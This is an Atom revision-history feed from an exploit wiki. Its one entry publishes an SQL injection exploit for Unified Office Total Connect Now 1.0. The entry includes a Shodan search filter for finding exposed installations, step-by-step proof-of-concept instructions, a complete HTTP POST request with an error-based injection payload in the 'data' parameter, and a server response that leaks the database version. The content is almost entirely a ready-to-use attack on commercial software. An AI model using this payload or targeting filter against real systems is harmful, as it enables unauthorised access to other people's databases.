<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Unified_Office_Total_Connect_Now_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>Unified Office Total Connect Now 1.0 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Unified_Office_Total_Connect_Now_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Unified_Office_Total_Connect_Now_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T02:43:58Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Unified_Office_Total_Connect_Now_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=5267&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection # Shodan Filter: http.title:&quot;TCN User Dashboard&quot; # Date: 06-16-2021 # Exploit Author: Ajai...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Unified_Office_Total_Connect_Now_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=5267&amp;oldid=prev"/>
		<updated>2021-06-17T08:20:14Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Unified Office Total Connect Now 1.0 – &amp;#039;data&amp;#039; SQL Injection # Shodan Filter: http.title:&amp;quot;TCN User Dashboard&amp;quot; # Date: 06-16-2021 # Exploit Author: Ajai...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection&lt;br /&gt;
# Shodan Filter: http.title:&amp;quot;TCN User Dashboard&amp;quot;&lt;br /&gt;
# Date: 06-16-2021&lt;br /&gt;
# Exploit Author: Ajaikumar Nadar&lt;br /&gt;
# Vendor Homepage: https://unifiedoffice.com/&lt;br /&gt;
# Software Link: https://unifiedoffice.com/voip-business-solutions/&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: CentOS + Apache/2.2.15&lt;br /&gt;
&lt;br /&gt;
POC:&lt;br /&gt;
1. Go to url http://localhost/operator/operatorLogin.php and login&lt;br /&gt;
2. Capture the request in Burpsuite and use the payload as given below.&lt;br /&gt;
3. Observe the response which reveals the DB version of mysql.&lt;br /&gt;
&lt;br /&gt;
Request:&lt;br /&gt;
&lt;br /&gt;
POST /operator/operatorLogin.php HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Length: 178&lt;br /&gt;
sec-ch-ua: &amp;quot;Chromium&amp;quot;;v=&amp;quot;89&amp;quot;, &amp;quot;;Not A Brand&amp;quot;;v=&amp;quot;99&amp;quot;&lt;br /&gt;
Accept: */*&lt;br /&gt;
X-Requested-With: XMLHttpRequest&lt;br /&gt;
sec-ch-ua-mobile: ?0&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded; charset=UTF-8&lt;br /&gt;
Origin: https://localhost&lt;br /&gt;
Sec-Fetch-Site: same-origin&lt;br /&gt;
Sec-Fetch-Mode: cors&lt;br /&gt;
Sec-Fetch-Dest: empty&lt;br /&gt;
Referer: https://localhost/operator/&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: en-US,en;q=0.9&lt;br /&gt;
Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81&lt;br /&gt;
&lt;br /&gt;
data={&amp;quot;extension&amp;quot;:&amp;quot;((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))&amp;quot;,&amp;quot;pin&amp;quot;:&amp;quot;bar&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Response:&lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 400 Bad Request&lt;br /&gt;
Date: Wed, 16 Jun 2021 12:49:56 GMT&lt;br /&gt;
Server: Apache/2.2.15 (CentOS)&lt;br /&gt;
X-Powered-By: PHP/5.3.10&lt;br /&gt;
Expires: Thu, 19 Nov 1981 08:52:00 GMT&lt;br /&gt;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0&lt;br /&gt;
Pragma: no-cache&lt;br /&gt;
Content-Length: 139&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html; charset=UTF-8&lt;br /&gt;
&lt;br /&gt;
Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>